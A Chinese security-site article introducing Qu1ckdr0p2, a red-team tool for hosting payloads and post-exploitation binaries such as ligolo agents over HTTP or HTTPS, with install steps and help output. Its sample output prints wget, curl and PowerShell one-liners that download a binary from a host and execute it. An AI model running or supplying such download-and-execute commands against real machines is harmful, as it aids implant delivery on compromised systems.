如何使用Qu1ckdr0p2快速通过HTTP或HTTPS实现文件托管
2023-12-19 18:41:49 Author: FreeBuf(查看原文) 阅读量:7 收藏


 关于Qu1ckdr0p2 

Qu1ckdr0p2是一款功能强大的文件托管工具,在该工具的帮助下,广大研究人员可以快速通过HTTP或HTTPS托管包括Payload和后渗透代码在内的任何文件。

Qu1ckdr0p2提供了别名和搜索功能,相关功能模块位于qu1ckdr0p2-tools库中。默认配置下,使用--https选项时该工具将生成一个自签名证书,,当Web服务器运行时,tun0接口会被优先使用,否则它将使用eth0接口。

common.ini文件中定义了--search和-u选项中需要使用的映射别名。

当网络服务器运行时,屏幕上会打印出几个下载地址,广大研究人员可以直接复制和粘贴使用。

 工具安装 

注意:当前版本的Qu1ckdr0p2仅支持通过pip工具进行安装,如果你直接将该项目源码克隆至本地的话,可能会出现一些意外问题。

首先,我们需要在本地设备上安装并配置好Python 3环境。接下来,直接使用pip3工具安装Qu1ckdr0p2:

pip3 install qu1ckdr0p2echo "alias serv='~/.local/bin/serv'" >> ~/.zshrcsource ~/.zshrc

(向右滑动,查看更多)

或者:

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrcsource ~/.bashrcserv init --update

(向右滑动,查看更多)

 工具使用 

在当前工作目录下托管一个单独的文件:

$ serv serve -f implant.bin --https 443

(向右滑动,查看更多)

$ serv serve -f file.example --http 8080

(向右滑动,查看更多)

工具更新和帮助信息:

$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...
  Welcome to qu1ckdr0p2 entry point.Options:
--debug 启用调试模式
  --help   显示工具帮助信息和退出Commands:
init 执行更新
serve 托管文件

(向右滑动,查看更多)

$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list 查看别名
-s, --search TEXT 搜索别名
-u, --use INTEGER 使用动态数字作为别名
-f, --file FILE 托管一个文件
--http INTEGER 使用HTTP+自定义端口
--https INTEGER 使用HTTPS+自定义端口
-h, --help 显示帮助信息和退出

(向右滑动,查看更多)

$ serv init --help       
Usage: serv init [OPTIONS]
  Perform updates.Options:
--update 检查并下载缺失的工具组件
--update-self 使用pip更新工具
--update-self-test 使用开发测试,将安装不稳定的工具组件
--help 显示帮助信息和退出

(向右滑动,查看更多)

工具更新命令:

$ serv init --update
$ serv init --update-self

从映射别名托管一个文件

-u选项要设置的映射别名数字是动态的,因此我们不需要记住指定的数字或输入工具名称:

$ serv serve --search ligolo                
[] Path: ~/.qu1ckdr0p2/windows/agent.exe
[] Alias: ligolo_agent_win
[] Use: 1
[] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[] Alias: ligolo_proxy_win
[] Use: 2
[] Path: ~/.qu1ckdr0p2/linux/agent
[] Alias: ligolo_agent_linux
[] Use: 3
[] Path: ~/.qu1ckdr0p2/linux/proxy
[] Alias: ligolo_proxy_linux
[] Use: 4
(...)

(向右滑动,查看更多)

$ serv serve --search ligolo -u 3 --http 80[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit
[→] URL: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
⠧ Web server running

(向右滑动,查看更多)

 工具运行截图 

 许可证协议 

本项目的开发与发布遵循MIT开源许可证协议。

 项目地址 

Qu1ckdr0p2:https://github.com/byinarie/qu1ckdr0p2

FreeBuf粉丝交流群招新啦!
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复“加群”,申请加入群聊
https://github.com/byinarie/qu1ckdr0p2-tools

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651251433&idx=4&sn=d10bf145d2c13023db95831ad805d412&chksm=bc96a09c20d6557a931ab566d2d1d6e60f916f6c7b875d7f582cc0104729943844351edbbbf7&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh